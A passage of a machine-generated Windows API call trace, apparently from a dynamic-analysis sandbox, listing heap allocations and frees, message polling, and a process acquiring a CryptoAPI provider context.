hHeap=0x970000) returned 1 [0236.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0236.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0236.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0236.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0236.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0236.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0236.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0236.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0236.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0236.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0236.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0236.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0236.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0236.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0236.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0236.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69b08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0236.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0236.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0236.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0236.957] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0236.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0236.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0236.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0236.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040a8 [0236.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0236.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0236.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0236.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69ba8 [0236.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69ba8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0236.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0236.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0236.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0236.958] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0236.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0236.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0236.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040a8 | out: hHeap=0x970000) returned 1 [0236.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0236.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0236.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0236.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0236.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0236.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0236.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0236.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0236.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0236.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0236.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0236.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0236.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0236.958] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0236.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0236.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0236.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0236.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0236.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0236.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0236.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0236.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0236.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0236.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0236.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0236.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0236.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0236.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0236.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0236.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0236.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0236.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0236.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0236.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0236.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0236.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0236.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0236.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0236.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0236.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0236.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0236.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0236.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0236.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0236.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0236.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0236.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0236.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0236.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0236.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0236.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0236.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0236.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0236.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0236.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0236.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0236.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0236.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0236.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0236.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0236.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0236.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0236.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0236.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0236.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0236.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0236.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0236.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0236.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0236.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0236.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0236.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0236.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0236.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0236.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0236.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0236.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0236.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0236.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0236.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0236.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0236.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0236.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0236.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0236.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0236.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0236.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0236.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0236.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0236.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0236.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0236.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0236.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0236.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0236.962] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0236.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0236.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0236.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0236.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0236.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0236.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0236.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0236.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0236.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0236.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0236.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0236.962] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0236.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0236.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0236.962] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0236.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0236.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0236.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0236.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54dc8 [0236.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0236.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0236.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0236.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0236.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0236.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0236.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e78 [0236.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0236.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0236.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0236.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0236.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0236.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0236.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0236.963] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0236.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0236.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0236.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0236.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0236.963] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0236.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0236.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0236.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0236.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0236.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0236.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0236.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0236.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0236.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0236.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0236.964] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0236.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0236.964] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0236.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0236.964] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0236.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f046c8 [0236.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0236.964] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0236.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f046c8 | out: hHeap=0x970000) returned 1 [0236.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0236.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cf8 [0236.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0236.964] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0236.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0236.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0236.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0236.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0236.965] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0236.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0236.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0236.965] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0236.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0236.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0236.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0236.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0236.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0236.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0236.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0236.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0236.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0236.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0236.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0236.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0236.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0236.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0236.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0236.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0236.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0236.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0236.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0236.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0236.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0236.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0236.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0236.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0236.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0236.966] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.966] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.967] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 